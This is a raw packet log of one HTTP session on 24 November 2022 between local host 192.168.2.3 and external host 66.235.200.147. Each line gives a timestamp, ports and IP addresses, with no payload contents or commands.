Nov 24, 2022 12:20:03.219949007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.219980955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.220010042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.220021009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.220036983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.220051050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.220798969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.220829964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.220855951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.220882893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.220916986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.220963955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.221550941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.221581936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.221607924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.221633911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.221647978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.221679926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.222337008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.222366095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.222393990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.222419977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.222424984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.222470999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.223129034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.223318100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.223345041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.223368883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.223387957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.223407984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.223458052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.224162102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.224196911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.224222898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.224261045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.232109070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.232147932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.232232094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.232259035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.232273102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.232285023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.232312918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.232323885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.232338905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.232341051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.232379913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.233308077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.233340979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.233366966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.233393908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.233419895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.233443975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.233488083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.235889912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.235924006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.235953093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.235979080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236006021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236008883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.236038923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.236052036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.236238003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236259937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236365080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236408949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.236473083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236500978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236529112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236552000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.236555099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.236593962 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.237279892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.237308025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.237334967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.237355947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.237360954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.237386942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.237397909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.237473011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.238168955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.238321066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.238348961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.238374949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.238398075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.238400936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.238415956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.239057064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.239087105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.239111900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.239140034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.239151955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.239165068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.239188910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.239207983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.240149021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.240180969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.240206957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.240232944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.240250111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.240258932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.240283966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.241365910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.241394997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.241420984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.241446972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.241456032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.241471052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.241496086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.241497993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.241516113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.250358105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250390053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250406981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250422001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250469923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.250513077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.250750065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250771046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250792027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250812054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250825882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.250833988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250853062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250859976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.250871897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.250895977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.252396107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.253084898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253106117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253123999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253142118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253160954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253205061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.253333092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253359079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253382921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253401041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.253412962 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.253438950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.254641056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254668951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254688025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254708052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254728079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254746914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254750967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.254767895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254786968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.254789114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.254827023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.256865978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.256887913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.256906033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.256925106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.256944895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.256956100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.256989002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.257026911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.257555962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257574081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257591963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257611036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257628918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257642984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.257647038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257664919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257672071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.257683039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.257697105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.257731915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.258430004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.258450031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.258467913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.258487940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.258503914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.258523941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.258563042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.269110918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269193888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269223928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269252062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269282103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269309998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269324064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.269335985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269365072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269381046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.269402981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.269584894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269613981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269643068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269656897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.269674063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269681931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.269701958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269726992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269756079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269764900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.269783974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.269792080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.271234989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271275997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271305084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271332026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271358013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271382093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.271384001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271410942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271414042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.271435976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271464109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.271656036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271681070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.271706104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.272865057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.272902012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.272928953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.272977114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.273010969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.275131941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275172949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275202036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275228977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275255919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275264025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.275280952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275305033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.275311947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275320053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.275337934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275382996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.275569916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275598049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275621891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275639057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.275650978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275676012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275701046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275717020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.275728941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275757074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.275793076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.276540041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.276576042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.276583910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.276606083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.276622057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.276633978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.276663065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.276690960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.276700020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.276710987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.276736021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.277278900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277309895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277340889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277368069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277371883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.277398109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277403116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.277425051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277439117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.277451038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277477980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.277492046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.278280020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278312922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278337955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278361082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278368950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.278388023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278390884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.278414965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278441906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.278443098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278470039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.278496027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.279187918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279220104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279273033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279299974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279326916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279356003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279381990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279393911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.279409885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.279458046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.280210972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280244112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280272007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280282021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.280299902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280324936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.280328035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280356884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280385017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280407906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.280412912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.280425072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.280441999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281286955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281326056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281352997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281363964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.281379938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281405926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281405926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.281428099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.281433105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281459093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.281470060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.281485081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282093048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.282197952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282229900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282260895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282290936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282303095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.282320976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282349110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282352924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.282376051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.282387972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.282403946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283231974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283279896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283305883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283329964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.283333063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283360958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283370972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.283389091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283416986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283444881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.283456087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.283479929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.287797928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.287846088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.287875891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.287909031 CET	80	49710	66.235.200.147	192.168.2.3
